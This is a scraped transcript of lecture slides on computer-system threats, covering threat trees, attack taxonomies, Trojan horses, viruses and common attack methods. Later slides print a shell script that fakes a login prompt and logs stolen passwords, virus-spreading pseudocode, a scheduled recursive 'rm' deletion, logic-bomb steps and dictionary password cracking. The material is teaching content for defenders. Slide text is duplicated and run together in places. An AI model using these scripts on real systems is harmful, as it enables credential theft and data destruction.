Chapter 2
Download
1 / 74

Chapter 2 - PowerPoint PPT Presentation


  • 321 Views
  • Updated On :

Chapter 2. Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks. Threats: defines as any potential occurrence, malicious and otherwise, that can have undesirable effect on the assets and resources associated with a computer system Vulenerability:

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Chapter 2' - althea


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
Chapter 2 l.jpg

Chapter 2

Threats To Computer Systems


2 1 threats vaulnerabilities and attacks l.jpg
2.1 Threats, Vaulnerabilities and Attacks

  • Threats:

    • defines as any potential occurrence, malicious and otherwise, that can have undesirable effect on the assets and resources associated with a computer system

  • Vulenerability:

    • is some unfortunate characteristic that makes it possible for a threat to potentially occur


Slide3 l.jpg

  • Attack:

    • is some action taken by malicious intruder that involves the exploitation of certain vulnerabilities in order to cause an existing threats to occur


2 2 types of threats l.jpg
2.2 Types of Threats

Categorization is needed to allow establishment of simple framework for understanding and solving security problems

  • Three main types of threats

    • disclosure threat

    • integrity threat

    • denial of service threat


2 2 1 disclosure threat l.jpg
2.2.1 Disclosure threat

  • This threat involves the dissemination of information to an individual for whom that information should not be seen

  • This information may be in computer storage or in transit between computer systems

  • disclosure of information is called “leak”

  • important for confidential organization such as military, government etc.


2 2 2 integrity threat l.jpg
2.2.2 Integrity threat

  • This threat involves any unauthorized change to information stored on a computer system or in transit between computer systems

  • non-critical information has less consequence

  • critical information can be disastrous

  • important for battle plans and commercial activities


2 2 3 denial of service threat l.jpg
2.2.3 Denial of service threat

  • This threat arises whenever access to some computer system resource is intentionally blocked as a result of malicious action taken by another user

  • critical for delaying weapon deployment or stock dealing

  • because the services are temporal characterized, this threat is more difficult to address than others


2 3 system security engineering l.jpg
2.3 System Security Engineering

  • To deal with problems of threats, vulnerabilities and attacks, a new discipline has recently emerged in the security community known as system security engineering

  • security engineering process (Fig. 2.1) will involve understanding of the security problems and derives protections against these problems


Slide9 l.jpg

Specify System

Architecture

Identify and

Install Safeguards

Identify Threats,

Vulnerabilites, Attacks

Estimate

Component Risk

Prioritize

Vulnerabilities

Risk is

Acceptably Low

Figure 2.1 System Security Engineering Process


Specify system architecture l.jpg
Specify System Architecture

  • Inspect the system

  • examine the network, host, interface and other associate architecture

  • use a structural specification include current security methods used

  • include a description of functional properties

  • create a security priority list


Identify threats vulnerabilities attacks l.jpg
Identify Threats, Vulnerabilities, Attacks

  • Identify potential threats from internal and external sources

  • estimate possible damage arises from attack

  • establish methodologies for minimise possibilities of attack


Estimate component risk l.jpg
Estimate Component Risk

  • Develop risk formula

  • Identify risk components

  • Prioritize risk factor


Prioritize vulnerabilities l.jpg
Prioritize Vulnerabilities

  • Base on risk priority developed in previous stage

  • this stage provide an order for installing security protections

  • limited resources may exist the high risk component will be deal with first


Identify and install safeguards l.jpg
Identify and Install Safeguards

  • Identify all possible safeguard approaches include standard security mechanisms

  • safeguard mechanisms will be examined

  • considerations on minimal in impact, performance degradation, cost and resources are needed


2 4 threat tree l.jpg
2.4 Threat Tree

  • High level threats serve as the starting point for further decomposition

  • threat decomposition is based on a threat tree

  • military standard MIL-STD 1785 is used

  • threat tree is similar to decision tree used for risk management & reliability engineering


2 4 1 arbitrary threat list l.jpg
2.4.1 Arbitrary Threat List

  • Threat can be identified during system design or development

  • it can also identified by a random, unstructured process called arbitrary threat list process

  • the list can be enriched during the design, development and operation stages

  • However, most threats have some unfortunate characteristics


Unfortunate characteristics l.jpg
Unfortunate Characteristics

  • Dubious Completeness: most threats are difficult to be identified completely

  • Lack of Rationale: known threats are identified by past history however ad hoc nature makes it difficult to rationale

  • Possible Inconsistencies: threats can be correlated and co-occurred. Independent events cannot prevent contradictory and redundant to be rectified simultaneously.


Slide18 l.jpg


2 4 2 developing a threat tree l.jpg
2.4.2 Developing a Threat Tree

  • first identify a list of possible threats

  • then introduce them in an iterative manner and refine the description carefully and gradually

  • the tree structure allows various threats to be associated in a root-node relationship

  • this approach can rationale the identified threat and simplify a security solution


2 4 3 structure of a threat tree l.jpg
2.4.3 Structure of a threat tree

  • Each tree composes a top label called Threat

  • each label will contain some generalized description of threat present in a given system

  • each root is a sub-threat which represents the refinement for a given node

  • the repetitive process will be terminated when all threats and sub-threats are identified, i.e. complete


Slide21 l.jpg

Threat

Sub-threat

  

Structure of a Threat Tree


Example hospital computer system l.jpg
Example: Hospital Computer System

  • Hospital Computer System Threat (HCST) is composed of Patient Medical Information (PMH) and non Patient Medical Information (NPMH)

  • PMH can further decomposed to Life Threatening (LT) and non Life Threatening (NLT) which both further decomposed to Disclosue (D), Integrity (I) and Denial of Service (DOS)


Slide23 l.jpg


Slide24 l.jpg

HCST Threat (NB). Where both threats are further decomposed into Malicious Developer (MDEV) threats introduced beforehand and those are not (NMDEV) threats

NPMH

PMH

LT

NB

NLT

B

D

I

I

DOS

D

DOS

MDEV

MDEV

NMDEV

NMDEV

Threat Tree of HCS


Slide25 l.jpg

Effects: Threat (NB). Where both threats are further decomposed into Malicious Developer (MDEV) threats introduced beforehand and those are not (NMDEV) threats

  • D: confidential patient information is disclosed

  • I: Patient information is corrupted

  • DOS: Patient information is not available

  • NMDEV(B) : billing information is corrupted

  • MDEV (NB): internal schedules are compromised


2 4 4 using threat tree to support system security engineering l.jpg
2.4.4 Using Threat Tree to Support System Security Engineering

  • Threat tree allows a structured means for documenting and organizing the estimation and calculations of critical, effort and risk factors

  • Critical defines the impact of the threat or the gain by introducing security measurements

  • Effort (E) defines the resources needed to resolve the threat

  • Risk (R=G/E) defines the normalized impact of threat if being attract


Slide27 l.jpg

HCST(8,2,4) Engineering

PMH(8,2,4)

NPMH(2,12)

LT(8,2,4)

NB(1,1,1)

NLT(2.2,1)

B(2,1,2)

I(5,5,1)

MDEV

(1,1,1)

NMDEV

(2,1,2)

DOS(8,2,4)

D(1,1,1)

Example on Risk Calculation using (G,E,R) value and maximum risk selection


2 5 categorization of attack l.jpg
2.5 Categorization of Attack Engineering

“Computer Crimes are probably the tip of an iceberg - but just how big is the iceberg is no one know” T.Perry & P. Wallich

  • Traditional three classes: disclosure, integrity and denial of services

  • Unclassified attacks: internet browsing, computation, storage and whatever

  • To acoount for specific type of attack - taxonomies are used


2 5 1 using an attack taxonomy l.jpg
2.5.1 Using an Attack Taxonomy Engineering

  • Attack Taxonomy is defined as any generalized categorization of potential attacks that might occur on a given computer system

  • Informal analysis can be used to identify threats and analytic means (threat tree) can be used to document attack or by reported experience with a target system


Slide30 l.jpg

  • Attack scenarios are sometimes identified for certain classes of systems including real-time, database and LAN and they must be dealt with appropriately in the target system in the early stage of security system development

  • Precisely determination of the system and attack characteristics with the interaction of environment will subsequently develop the final attack taxonomy by reducing the known attacks


Slide31 l.jpg

Attack classes of systems including real-time, database and LAN and they must be dealt with appropriately in the target system in the early stage of security system development

Taxonomy

Target

system

Attacks to the

Target System

Using an Attack Taxonomy

Attack

Taxonomy

(many

known

attacks)

Attack Taxonomy

(fewer known

attacks)

•••

Mitigate

Select

attacks

Mitigate

Select

attacks

Reducing Known Attacks


2 5 2 considerations in selecting an attack taxonomy l.jpg
2.5.2 Considerations in Selecting an Attack Taxonomy classes of systems including real-time, database and LAN and they must be dealt with appropriately in the target system in the early stage of security system development

  • Completeness: the categories of attack should be accompanied by evidence that all potentially unfortunate occurrences have been accounted for in the target system. The attack must be justifiable. However, most attacks are unstructured and system dependent, empirical evidence is the strongest justification for completeness in an attack taxonomy.


Slide33 l.jpg

  • Appropriateness: The selected attack taxonomy should appropriately characterize the attacks to the target systems. Assumption like malicious insiders are not present. Tradeoff sometimes required to evaluate common highly appropriate attack and less appropriate attack for a specified target systems

  • Internal vs. external threats: an attack taxonomy should differentiate between attacks form insider and outsider. Sometimes external attack taxonomy is entirely insecure for insider attack.


2 5 3 example simple attack taxonomy l.jpg
2.5.3 Example - Simple Attack Taxonomy appropriately characterize the attacks to the target systems. Assumption like malicious insiders are not present. Tradeoff sometimes required to evaluate common highly appropriate attack and less appropriate attack for a specified target systems


2 5 4 example risk based empirical attack taxonomy l.jpg
2.5.4 Example: Risk-based Empirical Attack Taxonomy appropriately characterize the attacks to the target systems. Assumption like malicious insiders are not present. Tradeoff sometimes required to evaluate common highly appropriate attack and less appropriate attack for a specified target systems

  • Simplified taxonomy cannot cater for the actual situation, empirical taxonomy with reasonable justification can make it more complete

  • Possible empirical attacks:

    • external information theft (glancing at someone’s terminal)

    • external abuse of resources (smashing a disk drive)


Slide36 l.jpg

  • Masquerading (recording and playing back network transmission)

  • pest programs (installing a malicious program)

  • Bypassing authentication or authority (password cracking)

  • authority abuse (falsifying records)

  • abuse through inaction (intentionally bad administration)

  • indirect abuse (using another system to create a malicious program)


Slide37 l.jpg

External Information theft transmission)

  • unauthorized individual stealing information or glance at other’s terminal to steal sensitive information like password, salary data, confidential information and so on

  • Avoid by setting external procedures such as secured terminal room, secured printer or paper shredders for discarding sensitive information


Slide38 l.jpg

External Abuse of Resources transmission)

  • This involves physical destruction of hardware such as disk drives, circuit boards, communication media and so on

  • Because this is an integrity attack, attacker must physical access to the physical resources but not necessary the internal resources

  • physical destruction may include vandalizing, switching off air conditioner or electrical power

  • sometimes abuse may not damage the hardware such as jamming or tapping

  • Avoidance by introducing physical security means like locked, guarding, surveillance camera and so on


Slide39 l.jpg

External Masquerading transmission)

  • this involves a malicious intruder successfully impersonating another user using some mechanism external to the computer system

  • examples are: tapping communication medium, recording the information transferred and playing back this information in a later time

  • this attack has been used by network hacker to avoid from being located

  • Avoidance by setting up proper network security procedures but the techniques are not straightforward


Slide40 l.jpg

Pest Programs transmission)

  • this includes attacks that are set up by malicious individuals to cause subsequent harm

  • a pest program can be views as time bomb, I.e. it will occur at a much later time

  • this time lag may provide opportunity for an intruder to cover tracks and avoid being caught instantaneous

  • well know types are Trojan horse and virus attacks

  • Countering pest program requires secure internal controls, awareness broadcasting and possible some shield programs


Slide41 l.jpg

Bypassing of Internal Controls transmission)

  • this involves the explicit avoidance of controls that are set up to protect the resources on a computer system

  • Bypassing usually refers to authorization, access and authority control. The technique is based on clever use of some existing logical flaw in the system

  • Examples are well known password cracking techniques that subvert protective approaches that contain flaws and operating system and compiler attacks usually involves logical exploitation of flaws to bypass authority


Slide42 l.jpg

Active Authority Abuse transmission)

  • this attack occurs when an individual is trusted to perform some type of sensitive or important function and then actively abuses this privilege

  • Examples falsifying certain data entries or granting services in improper manner

  • Avoidance is difficult but can be minimized by personnel screening, background checks and even polygraph tests


Slide43 l.jpg

Abuse through Inaction transmission)

  • this involves the willful neglect of duty by some malicious individual

  • attack occurs whenever some action is required to avoid a harmful situation but is not performed

  • example is that an administrator has neglected the maintenance of a system or recorder in order to cause degraded or denied service

  • avoidance by identifying all possible inaction, this is the first step for all attack avoidance mechanism.


Slide44 l.jpg

Indirect Abuse transmission)

  • this involves an off-line system and is characterized by behavior that may appear normal but is actually being carried out as a component or step in some comprehensive attack

  • Example: an indirect abuse involves the factoring a large number on one system as a mean for breaking a protection routine on another system.

  • Avoidance is extremely difficult because the appearance is completely normal to the system being used.


2 6 trojan horses and viruses l.jpg
2.6 Trojan Horses and Viruses transmission)

  • A type of program that is well known of provide self-reproduction is called Trojan Horse

  • This program is allow to distribute and propagate across different computer systems and is known as virus


2 6 1 trojan horses l.jpg
2.6.1 Trojan Horses transmission)

  • A Trojan Horse program shall be defined as any program that is expected to perform some desirable function but that actually performs some unexpected and undesirable function

  • It means that Trojan Horse program may look like a good program but it can potentially turns into harmful


Examples cat command in unix l.jpg
Examples: cat command in unix transmission)

user

“cat x”

(Trojan Horseversion)

“cat x”

(normal version)

Maliciously

altered

sequence of

system

routines

Normal

sequence of

operating

system

routines


Slide48 l.jpg

  • In a trusted group, the Trojan Horses is not critical and this approach allows co-workers to share information and resources and the malicious program will not be created

  • however if Trojan Horses has infiltrated into an trusted environment and can self-reproduced and propagated

  • this becomes viruses


2 6 2 viruses l.jpg
2.6.2 Viruses this approach allows co-workers to share information and resources and the malicious program will not be created

  • A virus program is defined as any Trojan Horse program that has been designed to self-produce and propagate so as to modify other programs to include a possible modified copy of the virus.

  • As computer networks have become more widespread, the potential for huge propagation has increased and this type of attack has become serious


Slide50 l.jpg

Trojan Horse

Creation

System A

Electronic

propagation

Manual

propagation

Trojan Horse

Duplication

Trojan Horse

Duplication

System B (connected

to system A)

System C (No connection

to system A)


2 6 3 self reproducing programs l.jpg
2.6.3 Self-Reproducing Programs horse on one machine and then duplicated on others via some propagation means

  • Self reproducing program is the key feature of virus

  • this feature is created by using the following steps:

    • declare a character string that corresponds to the main body of the program

    • print each character of the defined string individually

    • print the value of the array as a defined character string


Example self reproduce program l.jpg
Example: Self reproduce program horse on one machine and then duplicated on others via some propagation means

Char t[] ={'0', ' ', '}', 'm', 'a', 'i', 'n', …., 't', ')', ';', '}', 0};

main()

{ int i,

printf(“char t[] ={“);

for (i=0; t[i]!=0;i=i+1)

printf(“%d, “, t[i]);

printf(“%s”, t);

}


Slide53 l.jpg

  • Self reproducing program is so critical because it provides the basic mean by which copies of a Trojan horse can be produced automatically

  • combine such copies with a compiler allows one to create as many copies of the Trojan horse as one desires to compile

  • insertion of addition codes can cause damage when execute


2 6 4 typical virus operation l.jpg
2.6.4 Typical Virus Operation the basic mean by which copies of a Trojan horse can be produced automatically

  • Malicious intruders can initiate a virus attack by creating a program that does the following:

    • finds a connected system and sends self-reproducing code via remote copying command

    • initiates a a remote compilation of the self-reproducing code via the remote execution command

  • the process can repeat and affect other systems


Slide55 l.jpg

(1) send reproducing the basic mean by which copies of a Trojan horse can be produced automatically

virus

Virus

Duplicate

Virus

(2) remotely

execute virus

(4) send

reproducing

virus

(3) send

reproducing

virus





Duplicate

Virus

Virus Propagation


Example simple virus operation l.jpg
Example : simple virus operation the basic mean by which copies of a Trojan horse can be produced automatically

virus

while true do

find_host (h);

remote_copy (h,virus);

perform_damage;

remote_execute (h,virus);

od;


Example internet virus l.jpg
Example: Internet Virus the basic mean by which copies of a Trojan horse can be produced automatically

  • First Internet Virus was reported 1988 and was unleashed by a Cornell University student which has infected over 60,000 host computers

  • the virus attack data, TCP/IP communication protocol and steal password

  • the virus was detected and terminated by a team from MIT and Berkeley

  • however, the designer caught claimed that he has made a mistake in the programming


2 6 5 trojan horse clues l.jpg
2.6.5 Trojan Horse Clues the basic mean by which copies of a Trojan horse can be produced automatically

Presence of Trojan Horse can be detected by:

  • Suspicious Originator and Distribution: choose some reliable software/hardware manufacturer and distributor to avoid suspicious system components

  • Unexpected Size or Other Attributes: if the program size and attributes becomes suspicious, such slow time respond, the program needs to be investigated

  • Undocumented Origin and Experience:malicious or incompetent source are expected for this issue


2 7 common attack methods l.jpg
2.7 Common Attack Methods the basic mean by which copies of a Trojan horse can be produced automatically

  • Password Spoof

  • Password theft

  • logic bomb mail

  • scheduled file removal

  • field separator attack

  • insertion of compiler Trojan Horse


2 7 1 password spoof program l.jpg
2.7.1 Password Spoof Program the basic mean by which copies of a Trojan horse can be produced automatically

  • The first type of attack involves spoofing a user into believing that a computer terminal is correctly prompting that user for login and password information

  • normally, a Trojan Horse program is used to fake the normal login sequence that a user expects


Slide61 l.jpg

  • Properties of spoofing program: the basic mean by which copies of a Trojan horse can be produced automatically

    • the attacker gains physical access to the target individual’s computer terminal

    • the attacker logs onto the target system using whatever login and password are available to the attacker (if the attacker is an insider, then they could be his own). It is possible to use a different target computer with some procedure change

    • the Trojan Horse spoof program is left on the terminal for the target individual.


Example unix like command l.jpg
Example: Unix-like command the basic mean by which copies of a Trojan horse can be produced automatically

B1=‘ORIGIN: NODE whd1 MODULE 66 PORT 12’

B2=‘DESTINATION:’

FILE=$HOME/secure/suckers/fools

trap ‘’ 1 2 3 5 15

echo $B1

sleep 1

echo $B2

read dest

echo ‘login:

read login


Slide63 l.jpg

stty -echo the basic mean by which copies of a Trojan horse can be produced automatically

echo ‘password:

read password

stty echo

echo ‘’

echo $login $ password >>$file

echo ‘login incorrect’

exec login


Slide64 l.jpg

Responds the basic mean by which copies of a Trojan horse can be produced automatically

ORIGIN: NODE whd1 MODULE 66 PORT 12’

DESTINATION: node/mysystem

login: abc

password:xxxxx

login incorrect

login: abc

password:xxxxx

$


2 7 2 password theft by clever reasoning l.jpg
2.7.2 Password theft by clever reasoning the basic mean by which copies of a Trojan horse can be produced automatically

  • Password are mnemonic and can be guessed easily

  • First guess example: spouse’s name, children’s name, pet’s name, license plate number, phone number, date of birth, date of marriage, favorite sports team and so on

  • Second guess example - easy to type pattern: “qaql”


Slide66 l.jpg

  • Last approach - attack on the password file and encryption function

    • obtain a copy of the password and encryption function

    • obtain an electronic dictionary

    • create a routine that encrypt every entry in the dictionary and compare it with all entries in your copy of the password file

    • any match will real a valid password

  • Advantages: the intruder does guess or infer the password directly, the attack can be performed offline


2 7 3 logic bomb mail l.jpg
2.7.3 Logic Bomb Mail function

  • Logic bombs are programs that remain dormant until some predetermined logical condition on the target system becomes true

  • Step for setting up logic bomb:

    • set up a command that removes all files (e.g. “rm”) as an edit parameter to file EDIT_ME

    • mail EDIT_ME to your system administrator

  • if the administrator do not open the file, it will do no damage otherwise all file will be erased


2 7 4 scheduled file removal l.jpg
2.7.4 Scheduled File Removal function

  • Schedule file is used to schedule the smooth running of programs in a computer

  • On UNIX, command “at” is used

  • Example:

    rm -f -f /usr

    at 0400 Sunday attack

  • Program will be placed in the write-protected directory and will execute file removable recursively (-f) without diagnostics (-f) every Sunday


2 7 5 field separator attack l.jpg
2.7.5 Field Separator Attack function

  • This attack relies on several technical assumptions:

    • field separators exist

    • privilege execution program/command exist

    • the actual file name of the administrator want to execute


Slide70 l.jpg

  • Steps to create such attack function

    • redefine ‘/’ as ‘ ’ hence pathname “/foo/moo” becomes “ foo moo”

    • knowing the administrator will use “sysprog” to open file called “/foo/moo”, create a program call “foo” in an accessible directory. Program “foo” will transfer the administrator to the intruder

    • when “sysprog” is invoked, the program “foo” is executed and the attack is achieved.


2 7 6 insertion of compiler trojan horse l.jpg
2.7.6 Insertion of Compiler Trojan Horse function

  • Compiler Trojan Horse attack will create a more widespread damage

  • Normal simplified Compiler operation:

    compile:

    get (line);

    translate (line);

  • The goal of Trojan Horse is to look for certain text patterns in the input programs for compile to translate and code insertion


Slide72 l.jpg

  • Example: function

    Compile:

    get (line);

    if line = ‘read_pwd(p)” then

    translate (Trojan horse insertion);

    else

    translate (line);

    fi;

  • The Trojan Horse program may introduce a password backdoor and allow get into the system using common password like “12345”


2 7 7 simple attack prevention methods l.jpg
2.7.7 Simple Attack Prevention Methods function

  • Individual Screening

    • checking background of individual who allow to access the system may introduce attack to the system

  • Physical Control

    • securr the facilities with an enclosed environment

  • Care in operation

    • set up security procedures


2 8 references l.jpg
2.8 References function

  • E Amoroso - Chapters 1- 5


ad